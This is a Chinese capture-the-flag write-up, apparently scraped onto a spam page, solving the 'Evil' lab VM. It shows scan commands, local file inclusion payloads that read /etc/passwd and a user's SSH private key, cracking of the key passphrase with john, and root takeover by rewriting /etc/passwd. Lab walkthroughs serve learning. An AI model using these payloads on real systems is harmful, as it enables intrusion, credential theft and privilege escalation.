当前位置: 首页 > news >正文

珠海网站设计苏州网建公司

珠海网站设计,苏州网建公司,流程图制作网页,衡水网站建设衡水网站建设Evil 1.主机发现 使用命令探测存活主机,80.139是kali的地址,所以靶机地址就是80.134 fping -gaq 192.168.80.0/242.端口扫描 开放80,22端口 nmap -Pn -sV -p- -A 192.168.80.1343.信息收集 访问web界面 路径扫描 gobuster dir -u http…

Evil

1.主机发现

  • 使用命令探测存活主机,80.139是kali的地址,所以靶机地址就是80.134
fping -gaq 192.168.80.0/24

在这里插入图片描述

2.端口扫描

  • 开放80,22端口
nmap -Pn -sV -p- -A 192.168.80.134

在这里插入图片描述

3.信息收集

  • 访问web界面

    在这里插入图片描述

  • 路径扫描

    gobuster dir -u http://192.168.80.134 -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp
    

    在这里插入图片描述

  • 访问robots.txt

    在这里插入图片描述

  • 访问/secret ,发现是空页面

    在这里插入图片描述

  • 继续对/secret进行路径扫描

    gobuster dir -u http://192.168.80.134/secret -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp 
    

    在这里插入图片描述

  • 访问/evil.php,依然返回空页面

    在这里插入图片描述

  • 尝试对/evil.php的参数进行爆破,并没有探测出参数信息

    ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:KEY -w value.txt:VAL -u http://192.168.80.134/secret/evil.php?KEY=VAL -fs 0
    

    在这里插入图片描述

    在这里插入图片描述

  • 尝试/evil.php是否存在文件包含,目前已知根目录下的robots.txt文件是真实存在的,所以尝试对其再次进行文件包含探测;发现一个command参数

    ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:DIR -u http://192.168.80.134/secret/evil.php?DIR=../robots.txt -fs 0
    

    在这里插入图片描述

  • 验证command参数是否真正存在文件包含

    在这里插入图片描述

4.利用文件包含漏洞

  • 读取/etc/passwd文件

    在这里插入图片描述

  • 使用PHP协议封装读取evil.php源文件

    /secret/evil.php?command=php://filter/convert.base64-encode/resource=evil.php
    

    在这里插入图片描述

  • 对获得的字符串进行base64解码

    在这里插入图片描述

    <?php$filename = $_GET['command'];include($filename);
    ?>
    
  • 尝试写入文件,内容为123的base64编码后的字符串

    /secret/evil.php?command=php://filter/write=convert.base64-decode/resource=glc.php&txt=MTIz
    

    在这里插入图片描述

  • 尝试访问刚才写入的文件,发现没有给文件,证明写入失败

    在这里插入图片描述

5.尝试ssh登录

  • 刚才我们发现没有文件写入权限,那我们就换个思路,还记得我们当时读取的/etc/passwd文件吗,自己研究一下发现了一个mowree用户,尝试对其进行ssh登录

    在这里插入图片描述

  • 我们发现mowree用户允许公钥和密码登录两种方式

    ssh mowree@192.168.80.134 -v
    

    在这里插入图片描述

  • 那我们可以利用文件包含漏洞去读取mowree用户的公私钥文件

    • 公钥文件,发现是rsa加密的

      /secret/evil.php?command=../../../../../../home/mowree/.ssh/authorized_keys
      

      在这里插入图片描述

    • 私钥文件

      /secret/evil.php?command=../../../../../../home/mowree/.ssh/id_rsa
      

      在这里插入图片描述

  • 查看网站源码,将私钥文件的内容复制到本地,并给文件赋予权限,尝试ssh登录,发现需要passphrase(ssh-key 的密语字符串)

    在这里插入图片描述

  • 对passphrase进行爆破

    • 将id_rsa文件转换为john命令能够识别的文件

      ./ssh2john.py ~/id_rsa > ~/glc
      

      在这里插入图片描述

    • 使用john进行爆破,爆破成功,密码为unicorn

      john glc --wordlist=/usr/share/wordlists/rockyou.txt 
      

      在这里插入图片描述

6.获得shell

  • ssh登录mowree用户

    在这里插入图片描述

  • 拿到第一个flag

    在这里插入图片描述

7.提权

  • 查看内核版本和发行版本

    在这里插入图片描述

  • 内核版本4.19.0-17;发行版本 Debian10

  • 使用msf提权发现都提权失败了,有兴趣的可以自己试一下

  • 换个思路,查看存在写权限的文件

    find / -writable 2>/dev/null | grep -v proc
    

    在这里插入图片描述

  • 发现对/etc/passwd文件具有写权限,那么问题就变得简单了,直接修改文件中root账号的密码就可以啦

  • 生成一个加密密码,密码为root

    openssl passwd -1
    

    在这里插入图片描述

    在这里插入图片描述

  • 尝试用修改的密码登录root账号,成功提权,获得第二个flag

    在这里插入图片描述

http://www.yayakq.cn/news/461851/

相关文章:

  • 甘肃省建设工程安全质量监督局网站app分销系统开发
  • 长乐区住房和城乡建设局网站wordpress翻页数字
  • 程序员自己做网站怎么能来钱懒人网页编辑器手机版
  • 有什么好看的网站资源网页设计心得5000字
  • 网站建设公司都会有哪些花销superstore wordpress下载
  • 设计云网站建设东莞网站建设方案表
  • 黄石网站建设net后缀的可以做网站吗
  • 聊城做手机网站建设找一个免费域名的网站
  • 内蒙古建设工程质监站网站怎么改网站域名
  • 企业网站可以个人备案wordpress数据库下载
  • 每一个网站都是响应式吗wordpress导入不了
  • 组建网站开发团队优秀的电商app设计网站
  • 射阳做网站甘州区住房和城乡建设局网站
  • 网站建设销售是什么郴州吧百度贴吧
  • win7 iis建立网站网站建设丨金手指排名
  • 网站正在建设中 代码php做的网站如何该样式
  • 有哪些做汽配的网站有没有帮忙做推广的网站
  • 遂宁商城网站建设1年网站
  • 建设好的网站怎么分享福州志愿者官方网站怎么做
  • 墟沟企业建站价格表企业管理咨询培训
  • 丹徒网站建设代理商单位网站建设费用账务处理
  • 重庆做网站公司餐厅网站建设什么科目
  • wordpress网站打开很卡wordpress网站转app
  • wordpress 不同站点1688货源网一件代发童装
  • 广州乐地网站建设罗湖附近公司做网站建设哪家服务周到
  • 网站平台怎么做推广装饰设计网站建设
  • 电子商务网站建设实训需求分析运维工程师一月多少钱
  • 武陟外贸英文网站建设广东工程建设信息网站
  • 国外精品成品网站1688广州网站建设怎么样
  • 武功县住房与城乡建设局网站视频直播间